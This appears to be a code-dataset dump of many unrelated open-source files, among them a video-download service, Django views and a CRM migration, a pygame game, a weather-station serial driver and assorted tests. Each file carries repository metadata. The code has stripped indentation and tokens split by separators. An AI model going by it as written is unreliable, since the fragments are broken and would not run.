if lo<pivot-1 and lo != pivot:
quickSortRec(ar, n, lo, pivot-1)
# print ' '.join(ar)
if pivot+1<hi and pivot != hi:
quickSortRec(ar, n, pivot+1, hi)
# print ' '.join(ar)
|
leakim/svtplay-dl
|
lib/svtplay_dl/service/vg.py
|
Python
|
mit
| 2,200
| 0.001364
|
from __future__ import absolute_import
import re
import json
import copy
import os
from svtplay_dl.service impor
|
t Service, OpenGraphThumbMixin
from svtplay_dl.utils.urllib import urlpar
|
se
from svtplay_dl.utils import filenamify
from svtplay_dl.fetcher.http import HTTP
from svtplay_dl.fetcher.hds import hdsparse
from svtplay_dl.fetcher.hls import HLS, hlsparse
from svtplay_dl.error import ServiceError
class Vg(Service, OpenGraphThumbMixin):
supported_domains = ['vg.no', 'vgtv.no']
def get(self, options):
data = self.get_urldata()
match = re.search(r'data-videoid="([^"]+)"', data)
if not match:
parse = urlparse(self.url)
match = re.search(r'video/(\d+)/', parse.fragment)
if not match:
yield ServiceError("Can't find video file for: %s" % self.url)
return
videoid = match.group(1)
data = self.http.request("get", "http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website" % videoid).text
jsondata = json.loads(data)
if options.output_auto:
directory = os.path.dirname(options.output)
title = "%s" % jsondata["title"]
title = filenamify(title)
if len(directory):
options.output = os.path.join(directory, title)
else:
options.output = title
if self.exclude(options):
yield ServiceError("Excluding video")
return
if "hds" in jsondata["streamUrls"]:
streams = hdsparse(copy.copy(options), self.http.request("get", jsondata["streamUrls"]["hds"], params={"hdcore": "3.7.0"}).text, jsondata["streamUrls"]["hds"])
if streams:
for n in list(streams.keys()):
yield streams[n]
if "hls" in jsondata["streamUrls"]:
streams = hlsparse(jsondata["streamUrls"]["hls"], self.http.request("get", jsondata["streamUrls"]["hls"]).text)
for n in list(streams.keys()):
yield HLS(copy.copy(options), streams[n], n)
if "mp4" in jsondata["streamUrls"]:
yield HTTP(copy.copy(options), jsondata["streamUrls"]["mp4"])
|
StackStorm/st2cd
|
actions/kvstore.py
|
Python
|
apache-2.0
| 1,061
| 0.000943
|
from st2actions.runners.pythonrunner import Action
from st2client.client import Client
# Keep Compatability with 0.8 and 0.11 until st2build is upgraded
try:
from st2client.models.datastore import KeyValuePair
except ImportError:
from st2client.models.keyvalue import KeyValuePair
class KVPAction(Action):
def run(self, key, action, st2host='localhost', value=""):
try:
client = Client()
except Exception as e:
return e
if action == 'get':
kvp = client.keys.get_by_name(key)
if n
|
ot kvp:
raise Exception('Key error with %s.' % key)
return kvp.value
else:
instance = client.keys.get_by_name(key) or KeyValuePair()
instance.id = key
instance.name = key
|
instance.value = value
kvp = client.keys.update(instance) if action in ['create', 'update'] else None
if action == 'delete':
return kvp
else:
return kvp.serialize()
|
PNNutkung/Coursing-Field
|
index/views.py
|
Python
|
apache-2.0
| 876
| 0.004566
|
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from mainmodels.models import Course, FeaturedCourse
# Create your views here.
def index(req):
mostPopularCourses = Course.objects.raw('SELECT * FROM mainmodels_course as main_course JOIN (SELECT main_tran.courseID, COUNT(main_tran.takerID) as taker_amount FROM mainmodels_transaction as main_tran GROUP BY main_tran.courseID ORDER BY taker_amount DESC) as main_count ON main_c
|
ourse.c
|
ourseID = main_count.courseID LIMIT 10;')
featureCourses = FeaturedCourse.objects.raw('SELECT * FROM mainmodels_featuredcourse as main_feat JOIN mainmodels_course as main_course ON main_feat.course_id = main_course.courseID LIMIT 10;')
return render(req, 'index/main.html', {'pageTitle': 'Coursing Field', 'mostPopularCourses': mostPopularCourses, 'featureCourses': featureCourses})
|
italomaia/turtle-linux
|
games/FunnyBoat/run_game.py
|
Python
|
gpl-3.0
| 3,190
| 0.006583
|
#!/usr/bin/python
import pygame
import math
import random
import sys
import PixelPerfect
from pygame.locals import *
from water import Water
from menu import Menu
from game import Game
from highscores import Highscores
from options import Options
import util
from locals import *
import health
import cloud
import mine
import steamboat
import pirateboat
import shark
import seagull
def init():
health.init()
steamboat.init()
shark.init()
pirateboat.init()
cloud.init()
mine.init()
seagull.init()
def main():
global SCREEN_FULLSCREEN
pygame.init()
util.load_config()
if len(sys.argv) > 1:
for arg in sys.argv:
if arg == "-np":
Variables.particles = False
elif arg == "-na":
Variables.alpha = False
elif arg == "-nm":
Variables.music = False
elif arg == "-ns":
Variables.sound = False
elif arg == "-f":
SCREEN_FULLSCREEN = True
scr_options = 0
|
if SCREEN_FULLSCREEN: scr_options += FULLSCREEN
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT),scr_options ,32)
pygame.display.set_icon(util.load_image("kuvake"))
pygame.display.set_caption("Trip on the Funny Boat")
init()
joy = None
if pygame.joystick.get_count() > 0:
joy = pygame.joystick.Joystick(0)
joy.init()
try:
util.load_music("JDruid-Trip_on_the_Fu
|
nny_Boat")
if Variables.music:
pygame.mixer.music.play(-1)
except:
# It's not a critical problem if there's no music
pass
pygame.time.set_timer(NEXTFRAME, 1000 / FPS) # 30 fps
Water.global_water = Water()
main_selection = 0
while True:
main_selection = Menu(screen, ("New Game", "High Scores", "Options", "Quit"), main_selection).run()
if main_selection == 0:
# New Game
selection = Menu(screen, ("Story Mode", "Endless Mode")).run()
if selection == 0:
# Story
score = Game(screen).run()
Highscores(screen, score).run()
elif selection == 1:
# Endless
score = Game(screen, True).run()
Highscores(screen, score, True).run()
elif main_selection == 1:
# High Scores
selection = 0
while True:
selection = Menu(screen, ("Story Mode", "Endless Mode", "Endless Online"), selection).run()
if selection == 0:
# Story
Highscores(screen).run()
elif selection == 1:
# Endless
Highscores(screen, endless = True).run()
elif selection == 2:
# Online
Highscores(screen, endless = True, online = True).run()
else:
break
elif main_selection == 2:
# Options
selection = Options(screen).run()
else: #if main_selection == 3:
# Quit
return
if __name__ == '__main__':
main()
|
dvitme/odoo-addons
|
portal_partner_fix/__openerp__.py
|
Python
|
agpl-3.0
| 1,565
| 0.000639
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even th
|
e implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Af
|
fero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Partner Fix',
'version': '8.0.1.0.0',
'category': '',
'sequence': 14,
'summary': '',
'description': """
Portal Partner Fix
==================
Let user read his commercial partner
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'portal',
],
'data': [
'security/portal_security.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
nacc/autotest
|
client/deps/grubby/grubby.py
|
Python
|
gpl-2.0
| 518
| 0.003861
|
#!/usr/bin/python
import os
from autotest.client import utils
versi
|
on = 1
def setup(tarball, topdir):
srcdir = os.path
|
.join(topdir, 'src')
utils.extract_tarball_to_dir(tarball, srcdir)
os.chdir(srcdir)
utils.make()
os.environ['MAKEOPTS'] = 'mandir=/usr/share/man'
utils.make('install')
os.chdir(topdir)
pwd = os.getcwd()
tarball = os.path.join(pwd, 'grubby-8.11-autotest.tar.bz2')
utils.update_version(os.path.join(pwd, 'src'),
False, version, setup, tarball, pwd)
|
amcat/amcat
|
amcat/models/coding/tests/codingruletoolkit.py
|
Python
|
agpl-3.0
| 7,493
| 0.001735
|
###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from amcat.models import CodingRule, CodingSchemaField, Code
from amcat.models.coding.codingruletoolkit import schemarules_valid, parse, to_json, EQUALS, \
clean_tree, NOT, OR
from amcat.models.coding.codingschema import ValidationError
from amcat.tools import amcattest
class TestCodingRuleToolkit(amcattest.AmCATTestCase):
def condition(self, s, c):
return CodingRule(codingschema=s, condition=c)
def test_schemafield_valid(self):
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
CodingRule.objects.all().delete()
# Test multiple (correct) rules
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.condition(schema, "()").save()
self.assertTrue(schemarules_valid(schema))
self.condition(schema, "(3==2)").save()
self.assertFalse(schemarules_valid(schema))
def test_to_json(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema_with_fields[0])
tree = to_json(parse(c("{}=={}".format(code_field.id, o1.id))))
self.assertEquals(json.loads(tree), {"type": EQUALS, "values": [
{"type": "codingschemafield", "id": code_field.id},
{"type": "code", "id": o1.id}
]})
tree = parse(c("{}=={}".format(code_field.id, o1.id)))
self.assertEquals(json.dumps(to_json(tree, serialise=False)), to_json(tree))
def test_clean_tree(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
codebook, codebook_codes = amcattest.create_test_codebook_with_codes()
schema_with_fields = amcattest.create_test_schema_with_fields(codebook=codebook)
schema = schema_with_fields[0]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
tree = parse(c("{code_field.id}=={o1.id}".format(**locals())))
self.assertRaises(ValidationError, clean_tree, schema, tree)
tree = parse(c("{code_field.id}=={code.id}".format(code_field=code_field, code=codebook.codes[0])))
self.assertEquals(clean_tree(schema, tree), None)
self.assertRaises(ValidationError, clean_tree, amcatt
|
est.create_test_schema_with_fields()[0], tree)
def test_parse(self):
import functools
|
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
codebook = schema_with_fields[1]
text_field = schema_with_fields[2]
number_field = schema_with_fields[3]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
# Empty conditions should return None
self.assertEquals(parse(c("")), None)
self.assertEquals(parse(c("()")), None)
# Recursion should be checked for
cr = CodingRule.objects.create(codingschema=schema, label="foo", condition="()")
cr.condition = str(cr.id)
self.assertRaises(SyntaxError, parse, cr)
# Nonexisting fields should raise an error
cr.condition = "0==2"
self.assertRaises(CodingSchemaField.DoesNotExist, parse, cr)
cr.condition = "{}==0".format(code_field.id)
self.assertRaises(Code.DoesNotExist, parse, cr)
cr.condition = "0"
self.assertRaises(CodingRule.DoesNotExist, parse, cr)
cr.condition = "{}=={}".format(code_field.id, o1.id)
self.assertTrue(parse(cr) is not None)
# Wrong inputs for fields should raise an error
for inp in ("'a'", "0.2", "u'a'"):
cr.condition = "{}=={}".format(number_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "u'a'", repr(str(o1.id))):
cr.condition = "{}=={}".format(code_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "2"):
cr.condition = "{}=={}".format(text_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
# "Good" inputs shoudl not yield an error
for field, inp in ((number_field, 1), (text_field, "u'a'"), (code_field, o1.id)):
cr.condition = "{}=={}".format(field.id, inp)
self.assertTrue(parse(cr) is not None)
# Should accept Python-syntax (comments, etc)
cr.condition = """{}==(
# This should be a comment)
{})""".format(text_field.id, "u'a'")
self.assertTrue(parse(cr) is not None)
## Testing output
tree = parse(c("not {}".format(cr.id)))
self.assertEquals(tree["type"], NOT)
self.assertTrue(not isinstance(tree["value"], CodingRule))
tree = parse(c("{}=={}".format(text_field.id, "u'a'")))
self.assertEquals(tree, {"type": EQUALS, "values": (text_field, u'a')})
cr.save()
tree = parse(c("{cr.id} or {cr.id}".format(cr=cr)))
self.assertEquals(tree, {"type": OR, "values": (parse(cr), parse(cr))})
# Should accept greater than / greater or equal to / ...
parse(c("{number_field.id} > 5".format(**locals())))
parse(c("{number_field.id} < 5".format(**locals())))
parse(c("{number_field.id} >= 5".format(**locals())))
parse(c("{number_field.id} <= 5".format(**locals())))
# ..but not if schemafieldtype is text or code
self.assertRaises(SyntaxError, parse, c("{text_field.id} > 5".format(**locals())))
self.assertRaises(SyntaxError, parse, c("{code_field.id} > 5".format(**locals())))
|
lazzyCloud/SLR
|
db2owl/course_json2owl.py
|
Python
|
agpl-3.0
| 4,862
| 0.004319
|
import json
from owlready import *
# input parameters
file_path = sys.argv[1]
onto_path = sys.argv[2]
# load ontology
onto = get_ontology(onto_path).load()
# course found list
course_ids = []
# for each course, find the active version (avoid multi instances of one course)
with open(file_path + '/modulestore.active_versions.json','r') as f:
for line in f:
course = json.loads(line)
# for one course, only use its published version
course_id = course['versions']['published-branch']['$oid']
course_ids.append([course_id,'-v'+str(course['schema_version'])+':'+course['org']+'+'+course['course']+'+'+course['run']])
f.closed
for one_course in course_ids:
course_id = one_course[0]
# for each publish version we found, search for its structure data in json file
with open(file_path + '/modulestore.structures.json', 'r') as f:
for line in f:
obj = json.loads(line)
if obj['_id']['$oid'] == course_id:
# temp save this data to a json file
print('=======Find one=======')
print(course_id)
with open(file_path + '/' + course_id + '.json', 'w+') as fout:
json.dump(obj,fout)
fout.closed
break
f.closed
# function to find a instance by its id
def find_obj_by_oid(obj_list, obj_oid):
for one_obj in obj_list:
if one_obj.name == obj_oid:
return one_obj
return None
# function to find a instance by its xml name
def find_obj_by_xml_id(obj_list, obj_xml_id, obj_name):
for one_obj in obj_list:
if hasattr(one_obj, obj_name + '_xml_id') and getattr(one_obj, obj_name + '_xml_id')[0] == obj_xml_id:
return one_obj
return None
# for each course we found
for one_course in course_ids:
course_id = one_course[0]
# open its structure json file
print('===========deal with course : ' + course_id + '===========')
with open(file_path + '/' + course_id + '.json','r') as f:
for line in f:
obj = json.loads(line)
# find all its blocks
blocks = obj['blocks']
for block in blocks:
# for each block, if its type defined in ontology
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_xml_id = block['block_id']
# create an ontology individual for this block
temp_obj = getattr(onto, obj_name)(obj_oid)
# set xml id data property
getattr(temp_obj, obj_name+'_xml_id').append(obj_
|
xml_id)
# set display name property
if 'display_name' in block['fields'].keys():
obj_display_name = block['fields']['display_name']
getattr(temp_obj,o
|
bj_name+'_display_name').append(obj_display_name)
# if this instance is a course
if obj_name == 'course':
temp_id = obj_xml_id + str(one_course[1])
course_org = temp_id.split(':')[-1].split('+')[0]
course_tag = temp_id.split(':')[-1].split('+')[1]
# set course id, course org and course tag
getattr(temp_obj,obj_name+'_id').append(temp_id)
getattr(temp_obj,obj_name+'_org').append(course_org)
getattr(temp_obj,obj_name+'_tag').append(course_tag)
# create object property
for block in blocks:
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_list = onto.instances
temp_obj = find_obj_by_oid(obj_list, obj_oid)
# find sub-level instance of this block
temp_sub_obj_list = block['fields']['children']
for sub_obj in block['fields']['children']:
sub_obj_name = sub_obj[0]
sub_obj_xml_id = sub_obj[1]
sub_obj_list = onto.instances
temp_sub_obj = find_obj_by_xml_id(sub_obj_list, sub_obj_xml_id, sub_obj_name)
if obj_name == 'vertical':
temp_sub_obj_name = 'xblock'
else:
temp_sub_obj_name = sub_obj_name
if temp_sub_obj is not None:
# create object property
getattr(temp_obj,'has_' + temp_sub_obj_name).append(temp_sub_obj)
f.closed
onto.save()
|
garretlh/nimbus-drivers
|
src/main/python/nimbusdrivers/ws23xx.py
|
Python
|
gpl-3.0
| 72,031
| 0.004776
|
#!usr/bin/env python
#
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Kenneth Lavrsen for the Open2300 implementation:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/WebHome
# description of the station communication interface:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSAPI
# memory map:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSMemoryMap
#
# Thanks to Russell Stuart for the ws2300 python implementation:
# http://ace-host.stuart.id.au/russell/files/ws2300/
# and the map of the station memory:
# http://ace-host.stuart.id.au/russell/files/ws2300/memory_map_2300.txt
#
# This immplementation copies directly from Russell Stuart's implementation,
# but only the parts required to read from and write to the weather station.
"""Classes and functions for interfacing with WS-23xx weather stations.
LaCrosse made a number of stations in the 23xx series, including:
WS-2300, WS-2308, WS-2310, WS-2315, WS-2317, WS-2357
The stations were also sold as the TFA Matrix and TechnoLine 2350.
The WWVB receiver is located in the console.
To synchronize the console and sensors, press and hold the PLUS key for 2
seconds. When console is not synchronized no data will be received.
To do a factory reset, press and hold PRESSURE and WIND for 5 seconds.
A single bucket tip is 0.0204 in (0.518 mm).
The station has 175 history records. That is just over 7 days of data with
the default history recording interval of 60 minutes.
The station supports both wireless and wired communication between the
sensors and a station console. Wired connection updates data every 8 seconds.
Wireless connection updates data in 16 to 128 second intervals, depending on
wind speed and rain activity.
The connection type can be one of 0=cable, 3=lost, 15=wireless
sensor update frequency:
32 seconds when wind speed > 22.36 mph (wireless)
128 seconds when wind speed < 22.36 mph (wireless)
10 minutes (wireless after 5 failed attempts)
8 seconds (wired)
console update frequency:
15 seconds (pressure/temperature)
20 seconds (humidity)
It is possible to increase the rate of wireless updates:
http://www.wxforum.net/index.php?topic=2196.0
Sensors are connected by unshielded phone cables. RF interference can cause
random spikes in data, with one symptom being values of 25.5 m/s or 91.8 km/h
for the wind speed. Unfortunately those values are within the sensor limits
of 0-113 mph (50.52 m/s or 181.9 km/h). To reduce the number of spikes in
data, replace with shielded cables:
http://www.lavrsen.dk/sources/weather/windmod.htm
The station records wind speed and direction, but has no notion of gust.
The station calculates windchill and dewpoint.
The station has a serial connection to the computer.
This driver does not keep the serial port open for long periods. Instead, the
driver opens the serial port, reads data, then closes the port.
This driver polls the station. Use the polling_interval parameter to specify
how often to poll for data. If not specified, the polling interval will adapt
based on connection type and status.
USB-Serial Converters
With a USB-serial converter one can connect the station to a computer with
only USB ports, but not every converter will work properly. Perhaps the two
most common converters are based on the Prolific and FTDI chipsets. Many
people report better luck with the FTDI-based converters. Some converters
that use the Prolific chipset (PL2303) will work, but not all of them.
Known to work: ATEN UC-232A
Bounds checking
wind speed: 0-113 mph
wind direction: 0-360
humidity: 0-100
temperature: ok if not -22F and humidity is valid
dewpoint: ok if not -22F and humidity is valid
barometer: 25-35 inHg
rain rate: 0-10 in/hr
Discrepancies Between Implementations
As of December 2013, there are significant differences between the open2300,
wview, and ws2300 implementations. Current version numbers are as follows:
open2300 1.11
ws2300 1.8
wview 5.20.2
History Interval
The factory default is 60 minutes. The value stored in the console is one
less than the actual value (in minutes). So for the factory default of 60,
the console stores 59. The minimum interval is 1.
ws2300.py reports the actual value from the console, e.g., 59 when the
interval is 60. open2300 reports the interval, e.g., 60 when the interval
is 60. wview ignores the interval.
Detecting Bogus Sensor Values
wview queries the station 3 times for each sensor then accepts the value only
if the three values were close to each other.
open2300 sleeps 10 seconds if a wind measurement indicates invalid or overflow.
The ws2300.py implementation includes overflow and validity flags for values
from the wind sensors. It does not retry based on invalid or overflow.
Wind Speed
There is disagreement about how to calculate wind speed and how to determine
whether the wind speed is valid.
This d
|
river introduces a WindConversion object that uses open2300/wview
decoding so that wind speeds match that of open2300/wview. ws2300 1.8
incorrectly uses bcd2num instead of bin2num. This bug is fixed in this driver.
The memory map indicates the following:
addr smpl description
0x527 0 Wind overflow flag: 0 = normal
0x528 0 Wind minimum
|
code: 0=min, 1=--.-, 2=OFL
0x529 0 Windspeed: binary nibble 0 [m/s * 10]
0x52A 0 Windspeed: binary nibble 1 [m/s * 10]
0x52B 0 Windspeed: binary nibble 2 [m/s * 10]
0x52C 8 Wind Direction = nibble * 22.5 degrees
0x52D 8 Wind Direction 1 measurement ago
0x52E 9 Wind Direction 2 measurement ago
0x52F 8 Wind Direction 3 measurement ago
0x530 7 Wind Direction 4 measurement ago
0x531 7 Wind Direction 5 measurement ago
0x532 0
wview 5.20.2 implementation (wview apparently copied from open2300):
read 3 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
fail
} else {
dir = (x[2] >> 4) * 22.5
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0 * 2.23693629)
maxdir = dir
maxspeed = speed
}
open2300 1.10 implementation:
read 6 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
0x52a x[3]
0x52b x[4]
0x52c x[5]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
sleep 10
} else {
dir = x[2] >> 4
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0)
dir0 = (x[2] >> 4) * 22.5
dir1 = (x[3] & 0xf) * 22.5
dir2 = (x[3] >> 4) * 22.5
dir3 = (x[4] & 0xf) * 22.5
dir4 = (x[4] >> 4) * 22.5
dir5 = (x[5] & 0xf) * 22.5
}
ws2300.py 1.8 implementation:
read 1 nibble starting at 0x527
read 1 nibble starting at 0x528
read 4 nibble starting at 0x529
read 3 nibble starting at 0x529
read 1 nibble starting at 0x52c
read 1 nibble starting at 0x52d
read 1 nibble starting at 0x52e
read 1 nibble starting at 0x52f
read 1 nibble starting at 0x530
read 1 nibble starting at 0x531
0x527 overflow
0x528 validity
0x529 speed[0]
0x52a speed[1]
0x52b speed[2]
0x52c dir[0]
speed: ((x[2] * 100 + x[1] * 10 + x[0]) % 1000) / 10
velocity: (x[2] * 100 + x[1] * 10 + x[0]) / 10
dir = data[0] * 22.5
speed = (bcd2num(data) % 10**3 + 0) / 10**1
velocity = (bcd2num(data[:3])/10.0, bin2num(data[3:4]) * 22.5)
bcd2num([a,b,c]) -> c*100+b*10+a
"""
# TODO: use pyserial instead of LinuxSerialPort
# TODO: put the __enter__ and __exit__ scaffolding on serial port, not Station
# FIXME: unless we can get setTime to work, just ignore the console clock
# FIXME: detect bogus wind speed/direction
# i see these when the wind instrument is disconnected:
# ws 26.399999
# wsh 21
# w0 135
from __future__ import with_statement
import logging
import time
import string
import fcntl
import os
import select
import struct
import termios
import tty
from nimbusdrivers import *
DRIVER_NAME = 'WS23xx'
DRIVER_VERSION = '0.24'
def loader(config_dict):
return WS23xxDriver(config_dict=config_dict, **config_dict[DRIVER_NAME])
DEFAULT_PORT = '/dev/ttyUSB0'
def logdbg(msg):
logging.debug(msg)
def loginf(msg):
logging.info(msg)
def logcrt(msg):
logging.critical(msg)
def logerr(msg):
|
Com-Ericmas001/py-userbase
|
py_userbase/userbase_models.py
|
Python
|
mit
| 2,746
| 0.00437
|
import datetime
class AuthenticationInfo:
def __init__(self, password, email):
self.Password = password
self.Email = email
class ProfileInfo:
def __init__(self, display_name):
self.DisplayName = display_name
class Token:
def __init__(self, id_token, valid_until):
self.Id = id_token
self.ValidUntil = valid_until
class User:
def __init__(self, id_user, username, display_name, groups):
|
self.IdUser = id_user
sel
|
f.Username = username
self.DisplayName = display_name
self.Groups = groups
class Group:
def __init__(self, id_group, name):
self.Id = id_group
self.Name = name
class CreateUserRequest:
def __init__(self, username, authentication, profile):
self.Username = username
self.Authentication = authentication
self.Profile = profile
class ModifyCredentialsRequest:
def __init__(self, username, token, authentication):
self.Username = username
self.Token = token
self.Authentication = authentication
class ModifyProfileRequest:
def __init__(self, username, token, profile):
self.Username = username
self.Token = token
self.Profile = profile
class AddUserToGroupRequest:
def __init__(self, username, token, user_to_add, id_group):
self.Username = username
self.Token = token
self.UserToAdd = user_to_add
self.IdGroup = id_group
class TokenSuccessResponse:
def __init__(self, success, token):
self.Success = success
self.Token = token
@staticmethod
def invalid():
return TokenSuccessResponse(
False,
Token("", datetime.datetime.now()))
class ConnectUserResponse:
def __init__(self, success, token, id_user):
self.Success = success
self.Token = token
self.IdUser = id_user
@staticmethod
def invalid():
return ConnectUserResponse(
False,
Token("", datetime.datetime.now()),
0)
class UserSummaryResponse:
def __init__(self, success, token, display_name, groups):
self.Success = success
self.Token = token
self.DisplayName = display_name
self.Groups = groups
@staticmethod
def invalid():
return UserSummaryResponse(
False,
Token("", datetime.datetime.now()),
"", [])
class UserListResponse:
def __init__(self, success, token, users):
self.Success = success
self.Token = token
self.Users = users
@staticmethod
def invalid():
return UserListResponse(
False,
Token("", datetime.datetime.now()),
[])
|
flavio-fernandes/networking-odl
|
networking_odl/fwaas/driver.py
|
Python
|
apache-2.0
| 2,105
| 0
|
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron_fwaas.services.firewall.drivers import fwaas_base
from networking_odl.common import client as odl_client
from networking_odl.common import config # noqa
LOG = logging.getLogger(__name__)
class OpenDayl
|
ightFwaasDriver(fwaas_base.FwaasDriverBase):
"""OpenDaylight FWaaS Driver
This code is the backend implementation for the OpenDaylight FWaaS
driver for Openstack Neutron.
"""
def __init__(self):
LOG.debug("Initializing OpenDaylight FWaaS driver")
self.client = odl_client.OpenDaylightRestClient.create_client()
def create_firewall(self, apply_list, firewall):
"""Create the Firewall with default (drop all) policy.
The
|
default policy will be applied on all the interfaces of
trusted zone.
"""
pass
def delete_firewall(self, apply_list, firewall):
"""Delete firewall.
Removes all policies created by this instance and frees up
all the resources.
"""
pass
def update_firewall(self, apply_list, firewall):
"""Apply the policy on all trusted interfaces.
Remove previous policy and apply the new policy on all trusted
interfaces.
"""
pass
def apply_default_policy(self, apply_list, firewall):
"""Apply the default policy on all trusted interfaces.
Remove current policy and apply the default policy on all trusted
interfaces.
"""
pass
|
i2c2-caj/CS4990
|
Homework/crminal/crm/migrations/0001_initial.py
|
Python
|
gpl-2.0
| 6,674
| 0.004495
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CallLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.TextField()),
],
),
migrations.CreateModel(
|
name='
|
Campaign',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('website', models.URLField(null=True, blank=True)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'verbose_name_plural': 'companies',
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
('email', models.EmailField(max_length=200, null=True, blank=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
],
),
migrations.CreateModel(
name='Opportunity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.FloatField(help_text=b'How much this opportunity is worth to the organization')),
('create_date', models.DateTimeField(auto_now_add=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
('contact', models.ForeignKey(to='crm.Contact')),
('source', models.ForeignKey(help_text=b'How did this contact find out about us?', to='crm.Campaign')),
],
options={
'verbose_name_plural': 'opportunities',
},
),
migrations.CreateModel(
name='OpportunityStage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
